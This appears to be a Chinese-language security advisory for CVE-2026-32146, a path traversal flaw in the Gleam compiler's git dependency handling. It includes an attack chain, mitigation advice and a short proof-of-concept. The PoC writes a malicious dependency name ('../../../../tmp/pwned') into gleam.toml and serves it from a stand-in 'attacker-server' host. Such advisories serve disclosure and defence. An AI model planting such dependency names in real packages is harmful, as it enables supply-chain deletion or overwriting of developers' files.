IPBUF安全漏洞报告
English
CVE-2026-32146 CVSS 7.8 高危

CVE-2026-32146 Gleam编译器路径校验不恰当漏洞

披露日期: 2026-04-11
来源: 6b3ad84c-e1a6-4bf7-a703-f496b71e49db

漏洞信息

漏洞编号
CVE-2026-32146
漏洞类型
路径穿越
CVSS评分
7.8 高危
攻击向量
本地 (AV:L)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Gleam

相关标签

路径穿越任意文件写入Gleam依赖混淆

漏洞概述

Gleam编译器在处理git依赖时存在路径验证不当漏洞。攻击者可以通过构造恶意的依赖名称(包含路径遍历序列),在依赖下载和解析阶段覆盖或删除目标文件系统之外的任意目录。该漏洞影响Gleam 1.9.0-rc1至1.15.4版本。

技术细节

该漏洞的根源在于Gleam编译器在构建文件系统路径时,未对`gleam.toml`或`manifest.toml`中提供的依赖名称进行充分的校验或沙箱限制。在执行`gleam deps download`等解析git依赖的命令时,程序会将受控的依赖名称直接拼接进路径中,并执行目录删除和创建操作。攻击者通过控制直接或间接的git依赖,在依赖名称中注入相对路径(如`../`)或绝对路径参数,从而突破预期的依赖目录限制,导致任意文件系统位置的目录被删除或覆盖。这种文件系统的篡改可能导致数据丢失,甚至通过覆盖Git钩子或Shell配置文件进一步实现代码执行。

攻击链分析

STEP 1
1. 攻击准备
攻击者创建一个包含恶意`gleam.toml`的Git仓库,其中`name`字段包含路径遍历字符(如`../../..`)。
STEP 2
2. 诱导依赖
攻击者诱导受害者在项目中将该恶意仓库添加为依赖,或者通过供应链攻击植入到受害者的传递依赖中。
STEP 3
3. 触发漏洞
开发者执行`gleam deps download`命令以获取依赖。
STEP 4
4. 执行攻击
Gleam编译器解析依赖名称时未过滤特殊字符,将其拼接进文件路径。系统在预期目录之外的位置执行文件删除或写入操作,导致数据被篡改或丢失。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC Concept for CVE-2026-32146 # This PoC demonstrates how a malicious package name can exploit the path traversal. # 1. Create a malicious git repository structure mkdir malicious_repo && cd malicious_repo git init # 2. Create a gleam.toml with a path traversal payload in the name cat > gleam.toml <<EOF name = "../../../../tmp/pwned" version = "1.0.0" EOF # 3. Commit the changes git add . git commit -m "Malicious package" # 4. Serve this repo (e.g., via local git server or GitHub) # The victim adds this as a dependency in their project's gleam.toml: # [dependencies] # mal_dep = { git = "http://attacker-server/malicious_repo" } # 5. When the victim runs: # gleam deps download # # The compiler attempts to create the dependency directory using the name "../../../../tmp/pwned". # This results in the creation or overwriting of /tmp/pwned on the victim's filesystem.

影响范围

Gleam >= 1.9.0-rc1, <= 1.15.4

防御指南

临时缓解措施
在无法立即升级的情况下,建议开发者严格审查所有直接和间接依赖的`gleam.toml`文件,确保依赖名称不包含`../`等路径遍历字符。此外,应在沙箱或隔离环境中执行依赖下载操作,限制进程对宿主机关键文件系统的写入权限。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表